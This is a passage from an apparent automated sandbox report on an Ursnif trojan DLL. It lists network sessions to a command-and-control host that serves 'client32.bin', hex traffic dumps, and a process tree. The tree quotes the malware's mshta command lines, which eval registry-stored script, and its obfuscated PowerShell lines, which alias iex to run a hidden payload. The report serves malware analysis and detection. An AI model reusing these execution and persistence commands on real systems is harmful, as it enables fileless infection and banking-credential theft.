                          2021-12-14 09:34:08 UTC1867INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                          2021-12-14 09:34:08 UTC1883INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          8192.168.2.54980579.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:08 UTC1890OUTGET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1891INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=t7tkicntofbn6h47i9uut29i93; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1891INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                          Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          9192.168.2.54980679.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:08 UTC1890OUTGET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1893INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=epkmjqjhsvjopqqq17rp3d0rs6; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1893INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                          Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: loaddll32.exe PID: 6360 Parent PID: 780

                          General

                          Start time:10:33:06
                          Start date:14/12/2021
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\6.dll"
                          Imagebase:0x10c0000
                          File size:116736 bytes
                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 6376 Parent PID: 6360

                          General

                          Start time:10:33:06
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                          Imagebase:0x150000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 6388 Parent PID: 6360

                          General

                          Start time:10:33:07
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\6.dll
                          Imagebase:0xdd0000
                          File size:20992 bytes
                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:high

                          Chronological Activities

                          Analysis Process: rundll32.exe PID: 6400 Parent PID: 6376

                          General

                          Start time:10:33:07
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                          Imagebase:0x11a0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:high

                          Chronological Activities

                          Analysis Process: rundll32.exe PID: 6424 Parent PID: 6360

                          General

                          Start time:10:33:07
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
                          Imagebase:0x11a0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:high

                          Chronological Activities

                          Analysis Process: BackgroundTransferHost.exe PID: 5876 Parent PID: 792

                          General

                          Start time:10:33:35
                          Start date:14/12/2021
                          Path:C:\Windows\System32\BackgroundTransferHost.exe
                          Wow64 process (32bit):false
                          Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                          Imagebase:0x7ff64e5e0000
                          File size:36864 bytes
                          MD5 hash:02BA81746B929ECC9DB6665589B68335
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: mshta.exe PID: 4036 Parent PID: 3472

                          General

                          Start time:10:34:12
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: mshta.exe PID: 1488 Parent PID: 3472

                          General

                          Start time:10:34:12
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: mshta.exe PID: 3696 Parent PID: 3472

                          General

                          Start time:10:34:12
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 7132 Parent PID: 4036

                          General

                          Start time:10:34:15
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 7160 Parent PID: 3696

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 7012 Parent PID: 1488

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 7136 Parent PID: 7132

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 5752 Parent PID: 7160

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 7048 Parent PID: 7012

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: mshta.exe PID: 496 Parent PID: 3472

                          General

                          Start time:10:34:20
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 3532 Parent PID: 496

                          General

                          Start time:10:34:23
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 4196 Parent PID: 3532

                          General

                          Start time:10:34:23
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: csc.exe PID: 6552 Parent PID: 7012

                          General

                          Start time:10:34:26
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: cvtres.exe PID: 3620 Parent PID: 6552

                          General

                          Start time:10:34:32
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: csc.exe PID: 6188 Parent PID: 7160

                          General

                          Start time:10:34:32
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: csc.exe PID: 5760 Parent PID: 7132

                          General

                          Start time:10:34:32
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: control.exe PID: 4904 Parent PID: 6400

                          General

                          Start time:10:34:33
                          Start date:14/12/2021
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff65b0e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: csc.exe PID: 6248 Parent PID: 3532

                          General

                          Start time:10:34:35
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: cvtres.exe PID: 6796 Parent PID: 6188

                          General

                          Start time:10:34:35
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
